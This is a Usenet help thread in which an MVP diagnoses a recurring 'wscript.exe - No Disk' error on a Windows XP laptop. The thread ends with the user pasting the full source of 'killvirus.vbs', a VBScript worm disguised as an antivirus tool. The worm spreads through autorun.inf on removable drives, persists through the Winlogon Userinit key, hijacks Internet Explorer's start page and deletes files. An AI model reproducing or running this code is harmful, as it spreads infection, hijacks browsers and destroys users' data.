Pegasus [MVP] wrote:
>
>
> "samah" <samah@mymail.com> said this in news item
> news:uvfqy8hoKHA.5224@TK2MSFTNGP05.phx.gbl...
>> Pegasus [MVP] wrote:
>>>
>>>
>>> "samah" <samah@mymail.com> said this in news item
>>> news:u7ZLyWboKHA.1552@TK2MSFTNGP05.phx.gbl...
>>>> Pegasus [MVP] wrote:
>>>>>
>>>>>
>>>>> "samah" <samah@mymail.com> said this in news item
>>>>> news:#h8NPjUoKHA.5260@TK2MSFTNGP02.phx.gbl...
>>>>>> Pegasus [MVP] wrote:
>>>>>>>
>>>>>>> "samah" <samah@mymail.com> said this in news item
>>>>>>> news:unuO4CIoKHA.3664@TK2MSFTNGP04.phx.gbl...
>>>>>>>> Pegasus [MVP] wrote:
>>>>>>>>>
>>>>>>>>>
>>>>>>>>> "samah" <samah@mymail.com> said this in news item
>>>>>>>>> news:ej7Qc6#nKHA.5344@TK2MSFTNGP04.phx.gbl...
>>>>>>>>>> Pegasus [MVP] wrote:
>>>>>>>>>>>
>>>>>>>>>>>
>>>>>>>>>>> "samah" <samah@mymail.com> said this in news item
>>>>>>>>>>> news:umd$mO#nKHA.3948@TK2MSFTNGP06.phx.gbl...
>>>>>>>>>>>> Win XP SP3.
>>>>>>>>>>>>
>>>>>>>>>>>> After I eject a CD/DVD from my DVD drive or unmount an disk
>>>>>>>>>>>> image from the Daemon Tools virtual drive, I get an error
>>>>>>>>>>>> window with the title "wscript.exe - No Disk" and with the
>>>>>>>>>>>> message " There is no disk in the drive. Please insert a
>>>>>>>>>>>> disk into drive (drive letter):". There are three buttons
>>>>>>>>>>>> that I can click: Cancel, Try again, Continue. When I click
>>>>>>>>>>>> any of these options, the error window closes but pops up
>>>>>>>>>>>> again after an interval of approx. i minute. The only way I
>>>>>>>>>>>> can close this window permanently is by rebooting the system.
>>>>>>>>>>>>
>>>>>>>>>>>> Can anybody help me with this please.
>>>>>>>>>>>>
>>>>>>>>>>>> Thanks in advance.
>>>>>>>>>>>>
>>>>>>>>>>>> -samah.
>>>>>>>>>>>
>>>>>>>>>>> It seems you're running some script, perhaps malicious. How
>>>>>>>>>>> exactly do you eject your compact disk?
>>>>>>>>>>
>>>>>>>>>> With the 'Eject' button (it's a laptop).
>>>>>>>>>
>>>>>>>>> Ok. Now please do this:
>>>>>>>>> - Click Start/Run
>>>>>>>>> - Type the three letters cmd and press Enter
>>>>>>>>> - Type this command:
>>>>>>>>> tasklist | find /i "script"
>>>>>>>>> - Report what you see (if anything)
>>>>>>>>
>>>>>>>> Here is what I got after I re-booted to clear the error window:
>>>>>>>>
>>>>>>>> image name: wscript.exe
>>>>>>>> PID: 2320
>>>>>>>> session name: console
>>>>>>>> session #: 0
>>>>>>>> mem usage: 5964k
>>>>>>>>
>>>>>>>> This is what I got when the error window is active:
>>>>>>>>
>>>>>>>> image name: wscript.exe
>>>>>>>> PID: 2672
>>>>>>>> session name: console
>>>>>>>> session #: 0
>>>>>>>> mem usage: 2976k
>>>>>>>>
>>>>>>>> Sorry for my late response. Thank you.
>>>>>>>
>>>>>>> Here is a method to find out what script is running:
>>>>>>> 1. Click Start/Run
>>>>>>> 2. Type this command:
>>>>>>> notepad c
ScriptTest.bat
>>>>>>> 3. Allow the new file to be created.
>>>>>>> 4. Copy & paste the code below into the notepad session.
>>>>>>> Do NOT retype it!
>>>>>>> 5. Save and close the file.
>>>>>>> 6. Open Windows Explorer, locate cScriptTest.bat, then
>>>>>>> double-click it.
>>>>>>>
>>>>>>> When wscript.exe is active then my program will report the script
>>>>>>> that it runs. What is it? Can you locate it on the hard disk and
>>>>>>> post its contents here?
>>>>>>>
>>>>>>> @echo off
>>>>>>> set Scr="%temp%\TempVBS.vbs"
>>>>>>> set VB=echo^>^>%Scr%
>>>>>>> cd 1>nul 2>%Scr%
>>>>>>> %VB% Set oWMIService = GetObject("winmgmts\.\root\CIMV2")
>>>>>>> %VB% Set cItems = oWMIService.ExecQuery( _
>>>>>>> %VB% "SELECT * FROM Win32_Process where Name = 'wscript.exe'")
>>>>>>> %VB% If cItems.Count = 0 Then
>>>>>>> %VB% msgbox "Executable ""wscript.exe"" not found."
>>>>>>> %VB% Else
>>>>>>> %VB% For Each oItem In cItems
>>>>>>> %VB% msgbox "The command line is " ^& oItem.CommandLine ^&
>>>>>>> cItems.count
>>>>>>> %VB% Next
>>>>>>> %VB% End If
>>>>>>> cscript //nologo %Scr%
>>>>>>> del %Scr%
>>>>>>>
>>>>>>>
>>>>>> This is what I got:
>>>>>> "The command line is cwindows\system32\wscript.exe
>>>>>> cwindows\system32\killvirus.vbs1"
>>>>>>
>>>>>> Thank you so much for your time. Waiting for your advice.
>>>>>>
>>>>>
>>>>> Fine. You now know have two points of attack:
>>>>> - Your problem script is the file
>>>>> cwindows\system32\killvirus.vbs1. What does it contain.
>>>>> - It gets invoked by wscript.exe. You can prevent this by running
>>>>> msconfig.exe, then looking for wscript.exe under the Startup tab
>>>>> and removing the tick mark.
>>>>>
>>>>>
>>>>
>>>> Sorry. wscript.exe is not appearing in the Startup tab. I re-booted
>>>> in safe mode and tried again but still no luck.
>>>>
>>>> Thank you.
>>>
>>> What about my first question: What does the script file contain?
>>
>> Sorry. I could not locate the file. I searched not only the
>> cwindows\system32 folder but also the entire hard disk. Included the
>> system and hidden files in the search as well.
>>
>> Thank you.
>
> If you are unable to find the file killvirus.vbs1 and if you cannot find
> any reference to script.exe or wscript.exe under the Startup tab in
> msconfig.exe then you can silence this barking do by giving it a bone.
> The following command, when executed in the Start/Run box, will do it:
>
> notepad cwindows\System32\killvirus.vbs
>
> Place a space into the file, then save and close it. Note also that the
> file you reported (killvirus.vbs1) sounds unlikely. If it is a script
> file then it must have a .vbs extension, not .vbs1.
While trying to create a new file 'killvirus.vbs' as you suggested, an
existing file with the same name opened, the contents of which I have
copied and pasted below. The file now appears under system32 folder but
I am not able to delete it, it says that the file is in use by another
process. Your 'ScriptTest.bat' still shows the same results,
killvirus.vbs1 not .vbs.
awaiting your further suggestions and Thank you for your valuable time.
'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
Option Explicit
On Error Resume Next
Dim
Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
crvbs SystemDir,"killvirus.vbs"
Shells.RegWrite
"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"
Count
rv.DriveType
Do
delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window
Title","Microsoft Internet explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Internet
Explorer\Main\Search Page","http
/goggleonline.blogspot.com/"
Shells.RegWrite
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCmd","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http
/goggleonline.blogspot.com/"
Shells.RegWrite "HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"
Shells.RegWrite "HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\killvirus.vbs"
For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"
delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"killvirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If
Next
if Count <> 1 then
Wscript.sleep 20000
end if
loop while Count<>1
sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "killvirus.vbs" Then set Delete =
oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub
sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"killvirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
else
set Writ = fSys.CreateTextFile(fPath & "\killvirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub
sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe killvirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe killvirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe killvirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe killvirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe killvirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe killvirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
End sub
'edited by
anwesh.tiwari@gmail.com